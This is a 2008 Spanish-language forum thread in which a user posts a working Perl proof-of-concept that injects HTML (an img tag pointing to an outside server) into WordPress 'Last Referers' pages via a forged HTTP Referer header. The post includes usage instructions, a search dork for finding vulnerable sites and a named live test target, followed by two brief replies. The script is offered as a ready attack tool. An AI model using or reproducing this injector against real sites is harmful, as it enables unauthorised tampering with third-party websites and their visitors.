Título: WordPress Last Referers HTML INJECTION Proof of Concept
Publicado por: ZoneMx en 23 Enero 2008, 07:08 am
Saludos pues aqui les dejo esto lo he estado probando y funciona codigo en perl, sigo investigando.... ;D #/usr/bin/perl
#zONEm mXC gEN
#perl test to insert html code to WordPress Last referers
#Worpress: Dork:Is proudly powered by Wordpress last referers
#test with http://nerra.com/broadsword/
use strict;
use warnings;
use LWP;
my $wordweb=shift or help();
my $agente = LWP::UserAgent->new;
my $request = HTTP::Request->new(GET => $wordweb);
my ($response,$referer);
banner();
$referer=" '<img src='http://youserver/yourimage.png'>";
$request->referer($referer);
$response=$agente->request($request);
$response->is_success or die "$wordweb : ",$response->message,"\n";
$referer=" zoneM MxC hack you..";
$request->referer($referer);
$response=$agente->request($request);
$response->is_success or die "$wordweb : ",$response->message,"\n";
print "\nAhora se debe ver la imagen insertada en Last Referers\n";
print "\nMxC Gen Test\n";
sub banner{
print "test to INJECT html code to Last Referers in Wordpress";
}
sub help{
print "HTML LAST REFERERS WORDPRESS INJECTOR\n";
print "PROOF OF CONCEPT\n";
print "Proof by: ZoneM MxC Gen\n\n";
print "UsO:\n";
print "\tperl injeccion.pl [url]\n";
print "\t[url]-WordPress Site \n";
print "Example:\n";
print "\tperl injeccion.pl http://sitiowordpress.org/\n";
exit(0);
}
Título: Re: WordPress Last Referers HTML INJECTION Proof of Concept
Publicado por: -sagitari- en 26 Enero 2008, 14:28 pm
Por lo que veo en el code, si no me equivoco , el código que inyectas en la web del wordpress es clientside, ¿no?...
salu2
Título: Re: WordPress Last Referers HTML INJECTION Proof of Concept
Publicado por: 6666 en 28 Enero 2008, 14:37 pm
la verdad que si funciona!..pero que version? más datos exactamente.
|